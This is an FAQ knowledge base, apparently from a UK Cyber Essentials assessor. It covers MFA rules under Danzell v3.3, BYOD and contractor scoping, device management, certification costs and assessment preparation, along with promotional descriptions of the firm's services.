Yes, it combines something you are (biometric: face or fingerprint) or something you know (PIN) with something you have (the specific device, bound to the credential through TPM). Counts as passwordless under Danzell v3.3, which explicitly includes FIDO2 and similar methods. Important distinction: it must be Windows Hello for Business (managed by your organisation), not just Windows Hello (consumer version). The business version ties the credential to your Entra ID tenant.
Keywords: Windows Hello, passwordless, MFA, biometric, FIDO2, Danzell | Confidence: 0.9
Do admin accounts need MFA if regular accounts don't require it?
Under Danzell v3.3, MFA is mandatory for all cloud service accounts where available. That means both admin and standard accounts alike. The old distinction doesn't apply any more. But even if it did, admin accounts would be the priority because a compromised admin account gives an attacker full control of your environment. If you could only protect one type of account (which isn't the case under current rules), admin accounts every single time without question.
Keywords: admin accounts, MFA, mandatory, Danzell, priority | Confidence: 0.9
How do we handle admin accounts that can't support MFA?
If a cloud service genuinely doesn't offer MFA for admin accounts, document the technical limitation and your compensating controls. IP restrictions, strong unique passwords, enhanced monitoring. Contact the vendor in writing to request MFA support and keep that correspondence as evidence. Under Danzell v3.3, 'available' means the service provider offers it, not whether you've chosen to enable it. Cost is not a valid reason to claim MFA is unavailable.
Keywords: admin MFA, exceptions, compensating controls, documentation, unavailable | Confidence: 0.85
How do we define "available" for MFA?
If the service provider offers it as a feature, it counts as 'available' with no exceptions or ambiguity. It doesn't matter if it costs extra to enable. If the service supports MFA in any form (authenticator app, SMS, hardware key), you must enable it. The only valid exemption is if the provider genuinely doesn't offer any form of MFA. Cost, inconvenience and user complaints are not valid exemptions under the rules. Document the provider's MFA capabilities and your evidence that you've enabled them.
Keywords: MFA available, definition, Danzell, exemption, cost | Confidence: 0.9
What about legacy services with no MFA?
Document it as an exception with evidence: screenshots of the security settings showing no MFA option, or written confirmation from the vendor. Put compensating controls in place like strong unique passwords, IP restrictions if possible, enhanced monitoring. Then seriously ask whether that service should remain in use at all. A cloud service with no MFA capability in 2026 tells you something about its overall security posture.
Keywords: legacy services, no MFA, exceptions, compensating controls, cloud security | Confidence: 0.8
Can we argue cost makes MFA "unavailable"?
No, cost is not a valid reason under Danzell v3.3. If the service provider offers MFA, even as a paid add-on, you must enable it. Only exemption is genuine technical unavailability where the provider doesn't offer MFA at all. If the MFA tier is too expensive, that's a conversation about whether you should be using that service, not a CE exemption.
Keywords: MFA cost, unavailable, exemption, Danzell, compliance | Confidence: 0.9
How do we implement MFA for automated service accounts?
They can't respond to interactive MFA prompts. Use certificate-based authentication, managed identities (in Azure/AWS), or API keys with restricted permissions. Document why interactive MFA isn't technically feasible for each service account, since the same principle applies: prevent unauthorised use. Managed identities are strongest because credentials are handled by the platform and never stored in code.
Keywords: service accounts, automated, MFA, API keys, managed identity, certificates | Confidence: 0.8
Do shared functional accounts need MFA?
Yes, the same MFA rules apply as any other account. The challenge is practical: whose phone gets the MFA prompt? Options include using a shared hardware token (YubiKey kept in a secure location), an authenticator app on a shared company device, or restructuring so each person has their own account with MFA and a shared mailbox is accessed through delegation rather than shared credentials. Individual accounts with delegation is the cleanest approach. I recommend that approach every single time during assessments.
Keywords: shared accounts, functional accounts, MFA, delegation, compliance | Confidence: 0.8
What about BYOD MFA token management?
Staff using personal phones as MFA tokens need a clear process for when they leave, change phones, or lose their device. Require backup MFA methods during enrollment: a second device, backup codes, or a hardware key. When someone leaves, disable their cloud accounts (which invalidates MFA regardless of what's on their phone). For phone changes, most authenticator apps support backup and restore, or you can re-enroll MFA on the new device.
Keywords: BYOD, MFA tokens, phone management, offboarding, backup codes | Confidence: 0.75
How often must users re-authenticate with MFA?
CE doesn't specify an exact re-authentication frequency. MFA must be enforced at login, and 'remember this device' for up to 30 days is acceptable as long as it remembers the specific device (browser and computer combination). For admin accounts, I'd recommend shorter session timeouts. Four hours maximum with MFA required on every new session. A stolen password alone can't access your cloud services. The exact timeout is a business decision within those bounds.
Keywords: MFA frequency, re-authentication, session timeout, remember device | Confidence: 0.8
What documentation do assessors need for MFA exceptions?
For any service where MFA isn't enabled, I need evidence of why. Screenshots showing the service doesn't offer MFA, or written confirmation from the vendor that MFA isn't available. I'll also want to see compensating controls: strong passwords, IP restrictions, enhanced monitoring. A spreadsheet listing every cloud service in scope with its MFA status (enabled, not available, or in progress) is the most efficient way to present this.
Keywords: MFA exceptions, documentation, assessor evidence, compensating controls | Confidence: 0.8
What MFA mistakes cause assessment failures?
The most common MFA failures I see: MFA configured but not enforced (it's optional and some users haven't enabled it). Cloud services excluded from scope to dodge the MFA requirement (not allowed under Danzell v3.3). IP restrictions claimed as MFA alternative (no longer accepted). Admin accounts without MFA while standard accounts have it. Social media accounts without MFA (yes, they're in scope now). Shared accounts where nobody can demonstrate the MFA flow. Check every cloud service, not just Microsoft 365.
Keywords: MFA failures, assessment failures, common mistakes, compliance gaps | Confidence: 0.9
What should we be ready to demonstrate live?
For CE Plus, I'll ask you to log into your primary cloud service and show the MFA challenge (authenticator app, push notification, or hardware key). Show the admin portal where MFA policy is configured and prove it's mandatory, not optional. Pull up the user account list and demonstrate that 100% have MFA enabled with no gaps. Log into an admin account and show MFA is enforced for elevated access too. I want to see MFA actually working, not just screenshots of configuration pages. Practice the login flow beforehand so you're not fumbling during the assessment.
Keywords: CE Plus demonstration, MFA live demo, assessment evidence, admin portal | Confidence: 0.85
How do we handle the complexity of mixed MFA environments?
Map every cloud service in scope, document which MFA method each supports, enable the strongest option. You don't need the same MFA method everywhere. Microsoft 365 might use Authenticator app, your CRM might use SMS, your accounting software might use email codes. Each service needs MFA enabled with whatever method it supports. Keep a simple spreadsheet: service name, MFA method, enrollment status. That becomes your assessment evidence and your ongoing compliance tracker.
Keywords: mixed MFA, multiple services, MFA methods, compliance tracking | Confidence: 0.8
How do we create an approved application list?
Start with essentials: email client, calendar, productivity apps (Office or Google), collaboration tools (Teams or Slack), and any industry-specific applications. Add your security apps: password manager and authenticator for MFA. Then decide what to block: file-sharing apps you don't use, games, and unapproved VPN apps. Keep it to 10-20 approved apps for most SMEs. Review quarterly and add legitimate requests as they come in. Start restrictive and add as needed, which is much easier than the other way round.
Keywords: approved apps, application allowlist, MDM, mobile security, policy | Confidence: 0.75
Do we need to configure special authentication for our Azure AD environment?
Your Entra ID environment needs MFA enforced via conditional access policies for all users and admins accessing cloud services. That's the main requirement for CE compliance. For CE Plus, I may need a scanning account with appropriate permissions, but I'll cover that during the pre-assessment call. You don't need to change your authentication architecture. Just ensure MFA is enforced, admin accounts are separated, and conditional access policies are properly configured.
Keywords: Azure AD, Entra ID, authentication, conditional access, MFA, CE Plus | Confidence: 0.8
Can local admin accounts be used instead of domain authentication?
Local admin accounts can exist alongside domain or Entra ID accounts. CE requires admin accounts separated from daily-use accounts regardless of type. Nobody uses an admin account for email and browsing. Local, domain, Entra ID, doesn't matter for CE purposes. The separation principle is what counts: admin credentials only used when elevated access is needed.
Keywords: local admin, domain authentication, admin separation, Entra ID, access control | Confidence: 0.8
Devices & BYOD
Will assessor want to see every device?
No, I sample a representative selection across your device types. I'll pick a mix of Windows laptops, Macs, servers and mobiles to verify that what you declared in your CE Basic questionnaire matches reality. Sample needs to show firewalls enabled, malware protection running, patches applied within 14 days and proper access controls.
Keywords: device sampling, assessment, CE Plus, representative sample | Confidence: 0.95
What about mobile devices - do assessors check these?
Yes, any mobile device accessing your organisational data is in scope. I'll check they're running a supported OS, getting security updates within 14 days, using a lock screen, and if you've deployed MDM I'll verify that too. Most businesses pass easily with company iPhones or Android devices that have auto-updates enabled.
Keywords: mobile device, phone, tablet, assessment, MDM | Confidence: 0.95
What inventory mistakes cause re-assessments?
Most common inventory mistakes: missing cloud services staff have signed up to (personal Dropbox, forgotten SaaS tools), not listing all devices (home workers' laptops, mobile phones, tablets), and not including development or test environments. Any of these can trigger reassessment if I discover them during the screenshare. Under Danzell v3.3, BYOD devices that access organisational data are explicitly in scope, so check every personal phone that touches work email or files.
Keywords: inventory, asset discovery, scope, Danzell, BYOD | Confidence: 0.9
How do we avoid last-minute discoveries?
Run a full audit 2-4 weeks before. Check credit card statements for SaaS subscriptions, survey all departments about tools they use, check browser bookmarks on company devices and review Entra ID or Google Workspace sign-in logs for cloud services you didn't know about. I've seen businesses discover a forgotten CRM system during the screenshare. That's a bad time to find out.
Keywords: audit, discovery, preparation, cloud services, SaaS | Confidence: 0.9
What exactly counts as a "contractor" for Cyber Essentials?
Anyone accessing your in-scope systems or data counts, regardless of contract type. That includes freelancers, consultants, temps, managed service providers and agency staff. If they log into your systems, their devices must meet CE requirements: supported OS, 14-day patching, malware protection, MFA on cloud accounts and proper access controls. The test is always access to organisational data, not the person's job title.
Keywords: contractor, freelancer, consultant, scope, BYOD | Confidence: 0.92
Does my window cleaner's phone count if they use our Wi-Fi?
No, not if they're just using your Wi-Fi for personal internet access. The scope test is whether someone accesses your organisational data. A window cleaner browsing their own email on your guest Wi-Fi doesn't count. But if they've somehow got access to your company systems, shared drives or business email, their device is in scope.
Keywords: Wi-Fi, guest network, scope, organisational data | Confidence: 0.95
What's the easiest way to manage contractor devices?
Company-owned laptops are by far the simplest option. You control the security configuration, patches and malware protection, and you can easily demonstrate compliance during assessment. If that's not practical, use MDM software like Microsoft Intune or Google Workspace to enforce policies on their personal devices. The key is having evidence you can show me during assessment.
Keywords: contractor, device management, MDM, company laptop | Confidence: 0.92
How does Mobile Device Management (MDM) work for contractors?
MDM enforces CE security policies on contractor devices remotely. Once the contractor enrols their device, MDM can enforce passcodes, push security updates, require encryption, restrict which apps can access business data, and enable remote wipe if the device is lost. Main benefit for CE: proving contractor devices meet the same standards as your own. Use screenshots from the MDM console as your assessment evidence.
Keywords: MDM, contractor, Intune, device management, remote wipe | Confidence: 0.9
What about contractors who refuse MDM enrollment?
Don't give them access to your systems. CE requires all devices accessing organisational data to meet security standards, and without MDM you can't prove compliance. Alternatives: company laptop, managed virtual desktop, or limit access to non-sensitive systems you can exclude from scope.
Keywords: MDM, contractor, refusal, virtual desktop, scope exclusion | Confidence: 0.92
What about contractors needing admin access to our systems?
Separate named admin accounts that are auditable and revocable. Under CE, admin accounts must only be used for admin tasks, so the contractor's admin account should be distinct from their day-to-day user account. Enable MFA, set minimum privileges for their specific work, and disable the account the day the contract ends. I regularly see businesses fail because a contractor's admin account was left active months after they finished.
Keywords: contractor, admin access, privilege, MFA, account management | Confidence: 0.92
How often should I review contractor access?
Quarterly at minimum, and immediately when a contract ends. Same-day account disabling when a contractor finishes. Not 'when we get round to it.' Also check quarterly whether contractors still need the same level of access they were originally given. CE requires regular privilege reviews, and stale contractor accounts are one of the most common findings I flag during assessments.
Keywords: contractor, access review, account management, quarterly | Confidence: 0.9
Contractor says they're already "cyber secure" - is that enough?
That means nothing for your CE assessment at all. You're responsible for proving every device accessing your systems meets CE requirements, regardless of what they believe. Ask them for evidence: are their devices patched within 14 days? Is MFA enabled on their cloud accounts? Is their OS still supported and receiving patches? If they can't show you, treat them like any non-compliant device and either bring them up to standard or restrict their access.
Keywords: contractor, compliance evidence, verification, responsibility | Confidence: 0.92
Is it cheaper to exclude contractors entirely?
You can't exclude contractors who access your in-scope systems. That's not how scoping works under Danzell. If they touch your data, they're in scope. You can restructure to genuinely remove their access, but that's usually more expensive than managing their devices properly. Most businesses find a company laptop or MDM cheaper than completely redesigning contractor workflows.
Keywords: contractor, scope, exclusion, cost, MDM | Confidence: 0.9
What exactly does "application allowlisting" mean?
Only pre-approved apps can run on managed devices, and everything else is blocked by default. Opposite of blocklisting (blocking known bad apps). For CE, app stores on mobile devices provide this function because Apple and Google vet apps before listing them. On desktops, tools like Windows Defender Application Control or macOS Gatekeeper provide similar protection.
Keywords: allowlisting, application control, Gatekeeper, app store | Confidence: 0.92
Are the mobile device requirements in Cyber Essentials new?
They've been in CE for several versions, but Danzell (v3.3, mandatory from April 2026) tightens things considerably. BYOD devices that access organisational data are now explicitly in scope, MFA is mandatory on all cloud service accounts where supported, and social media accounts used for business are included. If you've been treating phones as out of scope, that's over.
Keywords: Danzell, v3.3, mobile, BYOD, MFA, scope change | Confidence: 0.92
Are there free MDM solutions that work for Cyber Essentials?
Intune is included free with Microsoft 365 Business Premium, which most businesses already have. It manages iOS, Android and Windows devices, enforces passcodes, requires encryption and enables remote wipe. Google Workspace also includes basic mobile management at no extra cost. For most small businesses, one of these covers CE requirements without spending anything extra.
Keywords: free MDM, Intune, Google Workspace, mobile management | Confidence: 0.92
What's the difference between BYOD and company device management?
Company-owned devices give you full control: configuration, updates, installed apps, replacement schedule. BYOD saves on hardware but you're relying on MDM to enforce policies on someone else's phone. Under Danzell, personal devices accessing organisational data must meet the same CE requirements as company devices, so whichever approach you choose, the compliance bar is identical.
Keywords: BYOD, company device, Danzell, MDM, compliance | Confidence: 0.9
What mobile device mistakes cause assessment failures?
Most common mobile failures I see: no MDM evidence at all ('we have policies but nothing enforcing them'), outdated devices running unsupported OS versions, no MFA on cloud accounts accessed from phones, and personal devices with business email but no management. Under Danzell, if a phone accesses any organisational data it's in scope. 'We didn't think phones counted' won't pass.
Keywords: mobile failure, MDM, assessment, Danzell, MFA | Confidence: 0.95
Will EDR slow down my computers?
The performance impact is minimal on business-grade hardware. 1-3% CPU during normal operations, 5-10% during active scanning, 200-500MB RAM. Users typically can't tell it's running at all. Significant slowdowns usually point to a hardware problem, not EDR.
Keywords: EDR, performance, CPU, RAM, speed | Confidence: 0.9
Who Needs It
What format should policies be in?
Any professional format: PDF, Word document, intranet pages. CE doesn't mandate a specific format for policies. Policies need to clearly document your security requirements and be accessible to staff. Don't write 50-page documents nobody reads when one page per control area is far more effective.
Keywords: policy format, documentation, security policy | Confidence: 0.9
Should I have admin accounts logged in already?
No, and that's actually a CE requirement in itself. Admin accounts must only be used for administrative tasks. Keep them logged out and only sign in when you need to demonstrate something during assessment. I'll ask you to log in live.
Keywords: admin accounts, separation, logged in, assessment | Confidence: 0.95
How do I handle data residency requirements?
CE doesn't mandate data location, but you must comply with GDPR and any contractual data residency obligations. For cloud services, document where your data is hosted. Most providers specify region in their settings or terms. If a client contract requires UK-only data storage, verify your cloud provider's data centre locations and configure accordingly.
Keywords: data residency, GDPR, cloud storage, data centre location | Confidence: 0.85
What about healthcare and finance sector benefits?
Healthcare businesses often need CE Plus for NHS supply chain contracts (PPN requirements), and DSPT alignment means CE controls overlap with NHS data security standards. Financial services firms face FCA expectations around operational resilience (PS21/3), and DORA (applying from January 2025 in the EU) adds further ICT risk requirements. Both sectors get stronger insurance benefits because insurers rate their data risk highly.
Keywords: healthcare, NHS, finance, FCA, DORA, DSPT | Confidence: 0.85
Will insurance benefits increase over time?
That's likely to happen over time, yes. As more businesses certify, insurers have better claims data showing CE-certified businesses are lower risk, and the market is maturing rapidly. CE is increasingly a baseline expectation, not a bonus. Businesses with multi-year certification history and claims-free records tend to see improving terms at each renewal.
Keywords: insurance trends, benefits over time, market maturity | Confidence: 0.82
Is FileVault encryption required for Cyber Essentials?
Not strictly required for desktop Macs that stay in the office. But effectively required for any Mac that leaves the premises. If a Mac is stolen or lost without encryption, the data is exposed. I expect to see FileVault on portable Macs. Takes about an hour to enable with no user impact.
Keywords: FileVault, encryption, macOS, portable devices, required | Confidence: 0.88
Can we use Gatekeeper instead of MDM for application control?
Yes, Gatekeeper (enabled by default on macOS) blocks unsigned and unnotarised apps, which satisfies CE secure configuration requirements. Full MDM-based allowlisting is stronger but not required. For CE Plus, be ready to show me Gatekeeper enabled and set to 'App Store and identified developers.'
Keywords: Gatekeeper, MDM, application control, macOS, CE compliance | Confidence: 0.9
How much additional revenue can CE unlock?
CE qualifies you for government contracts handling personal data or ICT services (mandatory under PPN 09/14). Value depends entirely on which contracts you pursue. Defence supply chain contracts, NHS supplier agreements and central government tenders all increasingly require CE as minimum. I've seen businesses win single contracts worth more than ten years of certification fees.
Keywords: revenue, government contracts, PPN 09/14, defence, NHS | Confidence: 0.85
Do I need CE Plus for government contracts?
Most government contracts require CE Basic at minimum. CE Plus is increasingly expected for contracts handling sensitive data (personal data, classified information, health records), defence and MOD supply chain work, and NHS digital services. Some departments now mandate CE Plus even when the formal requirement is Basic. If you're regularly bidding for government work, get CE Plus.
Keywords: government contracts, CE Plus, MOD, NHS, defence | Confidence: 0.9
What about private sector contracts requiring CE?
The trend is growing steadily across all sectors. Large corporations (FTSE 100, major banks, defence primes like BAE Systems and Rolls-Royce) increasingly mandate CE from their entire supply chain. Insurance companies are starting to require it for coverage. Professional services firms face client expectations for CE as standard due diligence. Enterprise or regulated clients will expect CE questions.
Keywords: private sector, supply chain, FTSE 100, client requirements | Confidence: 0.85
What if I miss the October 2025 deadline?
Windows 10 passed end-of-life in October 2025 and devices still running it fail CE immediately because there are no security patches being released. Your CE certificate will lapse at renewal. Options: upgrade to Windows 11, replace incompatible hardware, purchase Extended Security Updates (ESU) as a temporary bridge, or move devices off-scope if they don't handle organisational data. Don't wait on this because hardware procurement takes 2-3 weeks minimum.
Keywords: Windows 10 EOL, October 2025, deadline, ESU, hardware replacement | Confidence: 0.9
Why do I need EDR if I already have antivirus?
Traditional antivirus detects known malware signatures and nothing beyond that. EDR monitors behaviour patterns instead, catching things like a legitimate program suddenly encrypting files or a PowerShell script downloading something suspicious. EDR catches it even without a signature. For CE, standard antivirus meets the minimum malware protection requirement. EDR exceeds it and provides the evidence trail assessors like to see for CE Plus.
Keywords: EDR vs antivirus, behavioural detection, malware protection, CE Plus | Confidence: 0.9
Costs & Pricing
Is cloud migration cost-effective for CE compliance?
That's a commercial question rather than a CE question. Cloud can make CE compliance easier (centralised management, built-in MFA, automatic updates) but migration costs are separate from certification costs. Don't migrate specifically for CE because that's overkill. If you're already planning to move, cloud environments are generally simpler to certify because the controls are built into the platform.
Keywords: cloud migration, cost, compliance, business decision | Confidence: 0.85
How do we find all our cloud services?
Start with credit card statements for subscription charges and your IT asset register. Ask department heads what tools their teams use. Browser bookmarks and saved passwords on company devices. Entra ID or Google Workspace sign-in logs. The biggest gap is always shadow IT, meaning services individual staff signed up to without telling IT.
Keywords: cloud discovery, shadow IT, SaaS, inventory | Confidence: 0.9
What services do businesses commonly miss?
Domain registrars (GoDaddy, 123 Reg), website hosting or CMS platforms (WordPress, Squarespace), backup services running in the background, HR or payroll systems, accounting software beyond the main package, project management tools (Trello, Monday.com, Asana), and social media accounts used for business. Under Danzell, if your marketing team logs into LinkedIn or Facebook for company posts, those accounts are in scope.
Keywords: commonly missed, shadow IT, SaaS, Danzell, social media | Confidence: 0.9
Is the investment in Cyber Essentials worth it?
If you have specific business drivers, yes. Clear yes: government contracts (CE is mandatory for handling personal data or ICT services), clients require it, you want cyber insurance at better rates, or you handle sensitive data. Less clear: micro-business with no contracts requiring it and no plans to grow. Even then, the security improvements from implementing the five controls are worth the £320-2,000 investment.
Keywords: worth it, investment, business drivers, government contracts | Confidence: 0.88
What's the typical ROI for Cyber Essentials certification?
100-300% when you have clear business drivers (government contracts, insurance savings, client requirements). Can be negative if you're certifying without a specific reason. For a typical SME spending £1,200-2,000 on CE Plus: insurance savings (10-25% on a £3,000-10,000 policy = £300-2,500/year), contract access (one government tender won pays for years of certification), and avoided breach costs. The maths on this is straightforward when you lay it out.
Keywords: ROI, return on investment, business case, insurance savings | Confidence: 0.85
How quickly does Cyber Essentials pay for itself?
Typically pays for itself within 6-12 months through insurance savings alone. For example: CE Plus costs £1,200-2,000 and a cyber insurance premium reduction of 15% on a £5,000 policy saves £750/year. Win one government contract and the certification cost is irrelevant. I see this constantly during conversations with new clients. Businesses that don't see quick payback usually certified 'because someone told us to' without specific commercial drivers.
Keywords: payback period, ROI, insurance savings, contract access | Confidence: 0.85
How do I present ROI to finance teams?
Use hard numbers and skip the security jargon entirely. Three things: the cost (£1,200-2,000 for CE Plus), the guaranteed returns (insurance premium reduction, specific contract values requiring CE), and the risk avoidance (average SME breach cost is £8,170 in the 2025 Breaches Survey). Present a conservative scenario using only insurance savings. Anything else you get from it is upside. Finance teams respond to numbers, not 'improved security posture.' Most people get this wrong.
Keywords: ROI presentation, finance team, business case, hard numbers | Confidence: 0.85
What percentage of business PCs can actually run Windows 11?
About 60-70% of business PCs purchased from 2018 onwards meet Windows 11 requirements (TPM 2.0, UEFI Secure Boot, compatible 8th gen Intel or 2nd gen AMD Ryzen processor). PCs older than 2017 almost certainly need replacing. Quickest way to check: run Microsoft's PC Health Check app on a sample of devices, or deploy it via Intune across all machines.
Keywords: Windows 11 compatibility, TPM 2.0, business PCs, PC Health Check | Confidence: 0.88
My PC doesn't have TPM 2.0. What are my options?
Check your BIOS settings first because many PCs have TPM but it's disabled. Restart, enter BIOS/UEFI settings and look for TPM, PTT (Intel) or fTPM (AMD) under the Security section. If the chip genuinely isn't there: stay on Windows 10 until October 2025 (end of support), replace the hardware, or install Linux if the machine serves a specific non-Windows purpose.
Keywords: no TPM 2.0, BIOS, fTPM, PTT, hardware replacement | Confidence: 0.88
My Intel 7th Gen processor won't run Windows 11 officially. What can I do?
That processor doesn't meet Windows 11 CPU requirements. Your options: keep Windows 10 until October 2025 end-of-support and then replace the hardware, replace the hardware now and migrate early, or repurpose the machine for offline tasks outside your CE scope. Don't use the registry hack to force Windows 11. Unsupported installation that may miss security updates.
Keywords: Intel 7th Gen, Kaby Lake, Windows 11, replacement, end of support | Confidence: 0.88
What's the realistic cost to upgrade incompatible PCs?
Budget business desktops (Dell Optiplex, HP ProDesk, Lenovo ThinkCentre) cost £400-600 with Intel i5, 8GB RAM and 256GB SSD. Business laptops start around £500-800 for replacement. For 20 devices needing replacement, budget £10,000-16,000 for hardware plus £2,000-3,000 for deployment including data migration, configuration, and user setup. Leasing spreads it over 3-4 years if capex is tight.
Keywords: upgrade cost, hardware replacement, Windows 11, budget, leasing | Confidence: 0.85
How much does EDR cost compared to potential breach costs?
Cyber 365 EDR is £15/device/month, which for 50 devices comes to £9,000/year. Average ransomware incident cost for UK SMEs is £8,170 (2025 government survey), but that's the average, and severe incidents with data loss, downtime and recovery can exceed £100,000. EDR is insurance against the incident that shuts you down for a week. One prevented ransomware attack pays for years of EDR.
Keywords: EDR cost, breach cost, ransomware, £15/device, ROI | Confidence: 0.88
Assessment Preparation
What's the most important thing to prepare?
Organise evidence by the five controls: firewalls, secure configuration, access control, malware protection, patch management. Have admin access credentials ready for every system in scope so you can show me configurations live. The ones who struggle can't log into their own firewall or don't know which Microsoft 365 admin portal to use.
Keywords: preparation, evidence, five controls, admin access | Confidence: 0.95
Should I take fresh screenshots or use old ones?
I take the necessary screenshots during the assessment. Evidence must show controls are presently in place, so old screenshots won't work. Just make sure you can access all admin portals and configuration pages on the day.
Keywords: screenshots, evidence, assessment day, live evidence | Confidence: 0.95
What evidence do assessors actually want to see?
I need to see current configurations across the five CE control areas. That means firewall rules (inbound deny-by-default), patch status (everything within 14 days), MFA settings on cloud accounts, malware protection active on all devices, and user access controls showing separate admin accounts. Prepare admin portal access for everything in scope. I'll walk through it with you during the screenshare.
Keywords: evidence, assessor, five controls, admin portal, configuration | Confidence: 0.95
Should I brief assessor on our setup beforehand?
Send me your scope document and a high-level overview of your infrastructure before the assessment. Helps me understand your environment and prepare relevant checks. Don't overwhelm me with 50-page policy documents. Brief summary of what systems you use and how your network is set up. That's enough for me to prepare effectively and plan the assessment.
Keywords: briefing, scope document, infrastructure, preparation | Confidence: 0.92
What should I do in first 15 minutes of security incident?
Disconnect affected systems from the network immediately. Don't power off affected machines because you'll lose forensic evidence in RAM. Alert your IT lead and management immediately. Document everything: what you found, when, what you did. Start a timeline log from the moment of discovery. If personal data is involved, you're on a 72-hour clock for ICO notification so don't delay that assessment.
Keywords: incident response, first response, isolation, containment, ICO | Confidence: 0.9
How detailed should incident documentation be?
Detailed enough for insurance claims and legal purposes, but not so detailed it becomes a burden on your team. At minimum: timeline (discovery, actions, resolution), systems affected, data involved, who was notified, root cause analysis, and what you changed to prevent recurrence. If personal data was involved, your ICO notification needs to reference this documentation.
Keywords: incident documentation, timeline, insurance, ICO, root cause | Confidence: 0.88
How do we avoid common macOS assessment mistakes?
Check every Mac individually before assessment day and don't assume they're all configured the same. Verify the firewall is enabled on each machine (System Settings, Network, Firewall), confirm FileVault is on for any portable Macs, check that automatic updates are enabled and there's no backlog older than 14 days, and make sure you can demonstrate Gatekeeper is active. Most common failure I see: a single Mac in the corner that nobody remembered to configure.
Keywords: macOS, assessment mistakes, firewall, FileVault, Gatekeeper | Confidence: 0.9
How do we avoid MFA assessment failures?
Audit every cloud service with user accounts. Under Danzell, MFA is mandatory on all cloud service accounts where the service supports it. Not just admin accounts but every user account. Most common failure: MFA on Microsoft 365 but nothing on the accounting software, CRM, domain registrar, backup service, or social media accounts. List every service, check each one has MFA enabled, and keep screenshots of the MFA configuration page for each.
Keywords: MFA, assessment failure, Danzell, cloud services, audit | Confidence: 0.92
How do we handle third-party managed systems?
Still your responsibility, even if a third party manages your systems. Get written confirmation from your MSP or IT provider that they implement the required controls (patching within 14 days, MFA on admin accounts, firewall rules, malware protection). During assessment, you need to show me the configurations or provide evidence from your provider. 'Our IT company handles it' isn't sufficient. I need to see the controls are in place.
Keywords: third party, MSP, managed services, responsibility, evidence | Confidence: 0.9
What's the most important factor for assessment success?
Actually being compliant before assessment day, which sounds obvious but many businesses hope to wing it. Run through the five controls a week before: all devices patched within 14 days? Is MFA enabled on every cloud service in your scope? Are admin accounts properly separate from daily-use accounts? Is malware protection active on every device in scope? The assessment verifies what's already there and it doesn't fix things for you.
Keywords: assessment success, preparation, compliance, five controls | Confidence: 0.95
Our Service
How should I interact with the assessor?
Be honest and answer questions directly, show me what I ask to see, and if you don't know something, say so. It's a conversation rather than an interrogation. I'll guide you through everything, and if something isn't configured correctly, I'll tell you exactly what needs fixing. The more open you are, the smoother it goes.
Keywords: assessor interaction, CE assessment, what to expect, assessment day | Confidence: 0.85
How does Net Sec Group assessment process differ?
I'm an IASME-accredited assessor, not a reseller. You're dealing directly with the person who certifies you. Support throughout, unlimited retries, remediation guidance if issues come up. You get support until you pass, and that's the guarantee. The CE Plus assessment is 100% remote via Microsoft Teams and takes 2-4 hours.
Keywords: Net Sec Group, CE assessor, assessment process, direct assessor | Confidence: 0.9
Do you provide preparation support before assessment?
Yes, the level of support depends on which package you choose. Standard CE packages (£320-£600 for Basic, from £1,200 for Plus) include support until you pass. Far from compliant or want a hands-off approach? The CE Concierge package is designed for that. I handle everything, guaranteed pass, completely done-for-you. Get in touch and I'll help you figure out which suits your situation.
Keywords: preparation support, CE packages, concierge, assessment help | Confidence: 0.9
What if issues are found during Net Sec Group assessment?
Clear remediation advice on exactly what needs fixing and how. Once you've made the changes, I retest those areas at no extra cost. No retest fees, no limits on attempts. The goal is to get you certified as efficiently as possible.
Keywords: remediation, retest, assessment issues, fixing failures | Confidence: 0.9
Does Net Sec Group help with cloud migrations?
Security and compliance side, not the physical migration itself. Pre-migration gap analysis, CE-compliant cloud configurations (NSGs, MFA, conditional access, update management), and making sure your new environment passes assessment. Many businesses migrate to cloud and then fail their next CE assessment because security controls weren't configured properly. That's exactly the kind of problem I prevent from happening. For heavy lifting (server migration, application rehosting), I partner with migration specialists.
Keywords: cloud migration, cloud security, Azure, CE compliance cloud | Confidence: 0.85
Does Net Sec Group help with contractor compliance?
I can advise on how contractor access affects your CE scope. Under Danzell v3.3, any device accessing your systems or data is in scope, whether it's owned by your organisation or a contractor. I'll help you work out which contractor devices need to be included, what controls apply, and whether BYOD policies or separate network segments are the right approach.
Keywords: contractor compliance, BYOD contractors, third party access, scope | Confidence: 0.8
Does Net Sec Group provide incident response services?
Cyber 365 EDR + Patching (from £15/device/month) provides 24/7 endpoint monitoring with automated threat isolation. Malware or suspicious activity detected, the system contains it before it spreads. For active incident response during a breach, contact me at [email protected] or +44 20 3026 2904. Containment, forensic analysis, remediation, restoring CE compliance, and documenting everything for insurance claims.
Keywords: incident response, EDR, breach response, Cyber 365, emergency | Confidence: 0.9
Does Net Sec Group help with insurance negotiations?
I provide the technical evidence insurers need to justify CE-related discounts, but I don't negotiate contracts directly (not a licensed broker). Detailed CE Plus assessment reports, help with technical sections of insurance applications, and I can join calls with your broker to explain what the assessment proves about your security. If a breach occurs, I provide forensic evidence and incident documentation for claims. For actual premium negotiation, work with a specialist cyber insurance broker. Best results come from combining a broker who knows the market with my technical proof.
Keywords: insurance, cyber insurance, CE discount, broker, evidence | Confidence: 0.85
Compliance & Monitoring
How does Azure AD help with Cyber Essentials admin account separation?
Entra ID (formerly Azure AD) makes admin separation straightforward. Dedicated admin accounts separate from day-to-day, MFA on all admin accounts, audit logs to prove who accessed what during assessment. One of the best tools for demonstrating CE compliance because the evidence is built in.
Keywords: Entra ID, Azure AD, admin separation, MFA, audit logs | Confidence: 0.92
How often should I check compliance status?
Check patches on a weekly basis at minimum. The 14-day window is tight and easy to miss. MFA enrolment monthly to catch new starters or changed accounts. Full audit against all five controls quarterly. Businesses that fail renewals almost always checked once at certification and forgot about it for 11 months.
Keywords: compliance monitoring, patching, 14-day, MFA, quarterly audit | Confidence: 0.9
Should I monitor all devices or just sample?
Monitor all devices continuously without any exceptions at all. Every device in scope must maintain compliance year-round. Spot-checking misses devices that fall behind on patches or have malware protection disabled. A device can become non-compliant in under three weeks if nobody's watching.
Keywords: monitoring, all devices, continuous, patching, compliance | Confidence: 0.9
What's the best monitoring platform for CE compliance?
Start with what you already have: Windows Update reports, Microsoft 365 Security Centre, Google Workspace admin console, firewall dashboard. For automated patch management, NinjaOne or Intune handle the 14-day patching requirement well. You don't need enterprise SIEM for CE. You need reliable visibility across your five control areas.
Keywords: monitoring platform, NinjaOne, Intune, patch management, Security Centre | Confidence: 0.88
How long should I keep incident documentation?
Keep incident documentation for a minimum of six years. That covers the UK statute of limitations for most legal claims. GDPR incidents may require longer depending on type. Store documentation securely and include it in CE renewal evidence if I ask about incidents during your certification period.
Keywords: incident documentation, retention, six years, GDPR, legal | Confidence: 0.88
